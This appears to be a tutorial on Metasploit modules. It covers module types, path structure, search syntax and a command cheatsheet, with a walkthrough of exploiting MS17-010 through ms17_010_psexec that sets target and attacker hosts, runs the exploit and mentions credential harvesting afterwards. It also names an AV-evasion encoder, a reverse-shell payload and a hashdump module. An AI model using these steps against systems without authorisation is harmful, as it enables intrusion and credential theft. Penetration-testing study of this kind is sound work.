Working with Metasploit Modules

Overview of Metasploit Modules

Metasploit's modules are pre-built scripts designed for specific tasks such as vulnerability scanning, exploitation, post-exploitation, and evasion. They are a cornerstone of the framework, enabling penetration testers to streamline their workflows and automate tasks.

Purpose of Modules:

  • Automate repetitive processes.

  • Enhance manual testing by providing reusable functionality.

  • Organize tools and exploits into categorized scripts.

Types of Metasploit Modules

  1. Auxiliary Modules:

    • Non-exploit modules for scanning, fuzzing, sniffing, and information gathering.

    • Example:

      auxiliary/scanner/smb/smb_version
  2. Encoders:

    • Modify payloads to bypass detection mechanisms like antivirus (AV).

    • Example:

      x86/shikata_ga_nai
  3. Exploits:

    • Exploit vulnerabilities in systems or applications.

    • Example:

      exploit/windows/smb/ms17_010_eternalblue
  4. NOPs (No-Operation):

    • Maintain payload stability by filling memory with NOP instructions.

    • Example:

      generic/nop
  5. Payloads:

    • Code delivered to the target, often used to establish remote access.

    • Example:

      windows/meterpreter/reverse_tcp
  6. Post-Exploitation Modules:

    • Perform tasks after gaining access, such as lateral movement or data extraction.

    • Example:

      post/windows/gather/hashdump
  7. Plugins:

    • Extend Metasploit's functionality with additional features.

    • Example:

      openvas

Module Structure

Modules are organized hierarchically based on their type, target OS, service, and functionality.

General Format:

<type>/<os>/<service>/<module_name>

Example:

exploit/windows/http/iis_webdav_scstoragepathfromurl

Components Explained:

  1. Type: Module category (e.g., exploit, auxiliary).

  2. Operating System: Target OS (e.g., windows, linux).

  3. Service: Vulnerable application or protocol (e.g., http, smb).

  4. Name: Descriptive identifier of the module.

Searching for Modules

Use the search command to locate modules based on specific criteria.

Syntax:

search [<options>] [<keywords>:<value>]

Examples:

  • Search for modules related to MS17-010:

    search ms17_010
  • Filter by CVE ID:

    search cve:2009 type:exploit
  • Exclude specific platforms (e.g., Linux):

    search platform:-linux

Search Options:

Option
Description

-h

Displays help for the search command.

-o <file>

Saves search results to a file.

-S <regex>

Applies a regex filter to results.

-s <column>

Sorts results by a specific column.

-r

Reverses the sort order.

Using Modules: Practical Example

Scenario: Exploiting MS17-010 using the EternalRomance module.

  1. Search for the Exploit:

    msf6 > search ms17_010
  2. Select the Module:

    msf6 > use exploit/windows/smb/ms17_010_psexec
  3. View Module Information:

    msf6 exploit(ms17_010_psexec) > info
  4. Configure Options:

    msf6 exploit(ms17_010_psexec) > options
    msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
    msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
  5. Execute the Exploit:

    msf6 exploit(ms17_010_psexec) > run
  6. Post-Exploitation:

    • After gaining access, use payload commands (e.g., Meterpreter) to perform further actions such as privilege escalation or credential harvesting.


Command Cheatsheet

Command
Description

search <keyword>

Locate modules matching the keyword.

use <module_path>

Load a module into the console.

info

Display detailed information about a module.

show options

List configurable parameters for a module.

set <option> <value>

Configure a specific option.

run or exploit

Execute the module.

show payloads

View payloads compatible with the module.

show targets

List targets supported by the module.